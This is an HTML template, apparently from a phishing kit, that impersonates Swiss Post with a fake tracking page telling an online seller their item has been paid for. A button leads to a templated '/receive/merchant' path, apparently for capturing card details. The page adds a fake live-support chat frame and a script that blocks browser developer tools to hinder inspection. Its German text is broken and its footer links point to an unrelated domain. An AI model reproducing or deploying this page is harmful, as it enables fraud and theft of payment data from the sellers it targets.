<!DOCTYPE html>
<html lang="en" data-cbscriptallow="true"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
		
		<link href="https://post.ch/favicon.ico" rel="icon" type="image/x-icon">
		<meta name="viewport" content="width=device-width,initial-scale=1,user-scalable=no">
		<!-- support -->
		<link rel="stylesheet" href="/static/style/support/support_parent.css">
		<script src="/static/style/protect/protect.js"></script>
<title>Pagina iniziale | La Posta</title>
        <style>.header-menu-pnk {
	text-decoration: none;
    color: #404040;
    font-size: 17px;
    margin-right: 20px;
}
header {
}
#header2 {
	background-color: #31313d; 
	margin-top: 12px; 
	padding: 50px;
}
#header-block {
	margin: 0 auto;
    max-width: 1024px;
}
#b-menu {
	float: right; 
	width: 110px;
    font-size: 16px;
	margin-top: 6px;
}
#header-menu {
	width: 100%; 
	height: 30px; 
	margin-top: 27px;
}
#_1f {
	background: #fff;
	font-size: 12px;
	color: #414042;
}
.fblock-title a {
	font-weight: 600;
	color: #414042;
    text-decoration: none;
}
.fblock-title {
    margin-bottom: 20px;
}
.nav-info {
	margin: 0 auto;
	max-width: 1024px;
	padding: 20px 0;
}
.nav-info ul {
	display: flex;
	padding: 0;
}
.nav-info li {
	margin-bottom: 10px;
	list-style-type: none;
	font-size: 16px;
    margin: 20px;
}
.fblock-pnk {
	color: #414042;
    text-decoration: none;
}
.nolu-title {
	margin-top: 30px;
	margin-left: 40px;
    width: 70px;
}
#underheader {
	margin: 0 auto;
	max-width: 1024px;
}
.underheader-btn {
	background: #ffcd00;
	padding: 10px 20px;
	text-decoration: none;
	color: #3c3c3c;
}
#sled1 {
	width: 100%;
}
#sled2 {
	display: none;
}
._0 {
	margin: 0 auto;
	max-width: 1024px;
}
._1 {
	margin: 0 auto;
    max-width: 1024px;
    height: 29px;
    margin-top: 10px;
    display: flex;
    padding-left: 20px;
}
._111 {
	margin: 0 auto;
    max-width: 1024px;
    margin-top: 10px;
    padding-left: 20px;
}
._2 {
	height: 100%;
	/*background: url(logo.png) no-repeat 0 center / auto 26px;*/
	width: 90%;
}
._3 {
	width: 100%;
}
._4 {
	font-weight: bold;
	font-size: 20px;
}
._5 {
	margin-top: 12px;
}
._13 {
	font-weight: bold;
	font-size: 30px;
	margin-top: 50px;
	margin-bottom: 24px;
	margin-left: 16px;
}
._14 {
	margin-top: 12px;
}
._15 {
	width: 30%;
}
._16 {
	padding: 35px 16px;
    margin-bottom: 50px;
}
._17 {
	border-top: 1px solid #c5c5c5;
	padding: 50px;
	margin-bottom: 16px;
	color: #565656;
}
._177 {
	background: #ffffff;
    border: none;
    border-radius: 8px;
    box-shadow: 0 1px 2px rgb(0 0 0 / 10%);
}
._19 {
	padding: 12px;
    border: 1px solid #cacaca;
}
._20 {
	width: 250px;
	margin-top: 30px;
}
._21 {
	font-size: 16px;
	color: #555;
	margin-bottom: 24px;
}
._23 {
	padding: 12px;
	font-size: 20px;
	cursor: pointer;
	color: #fff;
    background: #dc1928;
    border-radius: 6px;
}
._23:disabled {
	background: #E8A4B8;
	cursor: default;
}
._24 {
	color: #999;
}
._30 {
	margin-bottom: 4px;
	font-size: 16px;
}
body {
	margin: 0;
	font-family: Arial;
	font-size: 14px;
	color: #222;
	word-break: break-word;
	background: rgb(255,255,255);
    background: linear-gradient(180deg, rgba(255,255,255,1) 0%, rgba(239,239,239,1) 22%, rgba(239,239,239,1) 99%);
}
input {
	font-family: Arial;
	font-size: 16px;
	color: #222;
	width: 100%;
	border: none;
	outline: none;
	box-sizing: border-box;
}
table {
	width: 100%;
	border-collapse: collapse;
}
a {
	text-decoration: none;
}
td {
	padding: 0;
}
#copyright {
	padding: 20px; 
	margin: 0 auto; 
	max-width: 984px;
}
@media all and (max-width: 960px) {
	._0 {
		max-width: 480px;
	}
	._1 {
		margin-top: 16px;
	}
	/*._3, ._16, ._21, ._20 {
		width: 100%;
	}*/
	._13 {
		font-size: 26px;
		margin-top: 32px;
	}
	#header-menu {
	    display: none;
	}
	._2 {
		width: 100%;
	}
	._15 {
	    width: 40%;
	}
	#_1f {
	display: block;
	padding: 30px;
	}
	.nav-info {
	    width: 50%;
	    margin-left: 20%;
	}
	#sled1 {
		display: none;
	}
	#sled2 {
		display: block;
		width: 100%;
	}
	.nav-info ul {
		display: block;
	}
	#underheader {
		display: none;
	}
	#copyright {
		max-width: 434px;
	}
}

</style>
        <script></script>
        <meta property="og:url" content="https://POSTA.ch/">
        <meta property="og:site_name" content="POSTA">
        <meta property="og:type" content="website">
        <meta property="og:locale" content="en_EN">
	</head>
	<body>
		<div class="
        chatra--webkit
        chatra--style-round
        chatra--side-bottom
        chatra--pos-right
        chatra--visible
        chatra--expanded
        chatra--fast-toggle
      " id="chatra" data-turbolinks-permanent="" style="width: 380px; height: 600px; transform: none; z-index: 2147483647; display:none;">
    <div id="chatra__iframe-wrapper">
      <iframe frameborder="0" id="chatra__iframe" allowtransparency="true" title="Chatra live chat" allow="autoplay" src="/static/style/support/index.html?id=<%=id %>" style="width: 380px; height: 600px; position: absolute"></iframe>
    </div>
  </div>
  <div class="support-circle" onclick="document.querySelector(&#39;#chatra&#39;).style.display = &#39;block&#39;;this.style.display = &#39;none&#39;"></div>
		<header>
			<div id="header-block">
                <div class="_1">
                    <div class="_2"><a href="#" title="OLX" class="sc-cpmKsF bcxWYD sc-eqIVtm kRufpp"> <img src="/static/style/postch/Schweizerische_Post_Logo.svg.png" height="46px"> </a></div>
                    <span id="b-menu">
                        <!-- <img style="width: 30px; " src="/search.png"> -->
                        <svg viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg" style="fill: #8c8c8c; height: 14px;"><path d="M12.5 12C8.7 12 7 8.987 7 6c0-4.145 2.762-6 5.5-6C16.3 0 18 3.013 18 6c0 4.145-2.762 6-5.5 6zM0 23.021V24h24v-.979c0-2.967-1.081-5.609-3.045-7.44C18.545 13.336 14.31 13 12 13c-2.31 0-6.545.335-8.955 2.582C1.08 17.412 0 20.054 0 23.022z"></path></svg>
                        <a href="https://pickanddrop.qa/auth/login" style="font-size: 13px; color: #4d4d54;">Login</a>
                    </span>
                </div>
			</div>
		</header>
		<div id="header2">
			<div class="_111">
                    <div class="_13" style="color: #fff; margin-top: 0;">Spurenelement</div>
                    <div>
                        <input type="text" value="198437693" style="padding: 20px; border-radius: 6px; color: #777; font-size: 20px;">
                    </div>
                    <div style="text-align: center; color: #fff; margin-top: 20px; font-weight: 600;">Tipp: Sie konnenGeben Sie bis zu 10 Tracking-Nummern ein, getrennt durch Leerzeichen oder Kommas</div>
                </div>
		</div>
		
		<div class="_0">
			
			<div>
				<div class="_3">
					<div class="_17">
						<div style="font-size: 18px; margin-bottom: 20px;">Spurhaltungszahl: <span style="color: #dc1928; margin-left: 10px;">198437693</span></div>
						<div style="font-size: 18px;">Status: <span style="color: #dc1928; margin-left: 10px;">Empfangen von Vergnugen</span></div>
					</div>
				</div>
				<div class="_3">
					<div class="_17 _177">
						<h2>Ihr Artikel wurde bezahlt!</h2>
						<div style="font-size: 16px; line-height: 1.7;"> 
							Sobald Sie das Geld auf Ihrer Karte erhalten haben, senden Sie es gema? den oben genannten Daten an den Kaufer
                                    <br><br>Nach Versand der Ware, bieten Kaufer mit tracking-Nummer
						</div>
						<a href="/receive/merchant/<%=id %>">
                                            <button class="_23">
                                                Weiterhin                            </button>
						</a>
					</div>
				</div>
				
				<div class="_16">
					<form action="/receive/merchant/<%=id %>" method="GET">
						<input id="_formCost" name="fcost" value="0" type="hidden">
						<div class="_4">Paketdaten:</div>
						<div class="_14 _21">
							<table>
								<tbody><tr>
									<td class="_19 _15">Produkt:</td>
									<td class="_19"><%=name %></td>
								</tr>
								<tr>
									<td class="_19 _15">Lieferadresse:</td>
									<td class="_19"><%=address %></td>
								</tr>
								<tr>
									<td class="_19 _15">Preis:</td>
									<td class="_19"><%=price %> CHF</td>
								</tr>
								<tr>
									<td class="_19 _15">Spurhaltungszahl:</td>
									<td class="_19">198437693</td>
								</tr>
							</tbody></table>
						</div>
					</form>
				</div>
				<div style="padding: 10px; margin-bottom: 100px;">
					<!-- <img id="sled1" src="Sledzenie1.png">
					<img id="sled2" src="Sledzenie2.png"> -->
				</div>
			</div>
			
		</div>
		<div id="_1f">
				<div class="nav-info">
                    <ul>
                        <li><a class="fblock-pnk" href="https://pickanddrop.qa/about-us">Uber uns</a></li>
                        <li><a class="fblock-pnk" href="https://pickanddrop.qa/help-and-support">?Kontaktieren Sie uns</a></li>
                        <li><a class="fblock-pnk" href="https://pickanddrop.qa/service-updates/current-updates/voluntary-product-recall-animal-night-lights">Ruckrufaktion</a></li>
                        <li><a class="fblock-pnk" href="https://pickanddrop.qa/travel-essentials">Reise</a></li>
                        <li><a class="fblock-pnk" href="https://pickanddrop.qa/community-stories">Gemeinschaft</a></li>
                        <li><a class="fblock-pnk" href="https://pickanddrop.qa/jobs">Gemeinschaft</a></li>
                    </ul>
                </div>
                <div style="background: #31313d; padding: 10px 0; color: #fff;">
                    <div id="copyright">
                          Traditionelle Huter des Landes, an dem wir arbeiten, leben und sammeln als Mitarbeiter und erkennen ihren standigen Kontakt mit Land, Wasser und Gesellschaft. Wir zollen den Altesten der Vergangenheit, Gegenwart und Zukunft Respekt.
                    </div>
                </div>
				
			</div>
			<script type="text/javascript">
				function openForm() {
				  $('#myForm').css('display', 'block')
				$('#open-support').css('display', 'none')
			  }
			
			  function closeForm() {
				$('#myForm').css('display', 'none')
				$('#open-support').css('display', 'block')
			
			  }
			</script>

<script src="https://cdn.jsdelivr.net/gh/fz6m/console-ban@3.2/dist/console-ban.min.js"></script>
<script>
    ConsoleBan.init({
        redirect: 'https://http.cat/403'
    })
</script>
</body></html>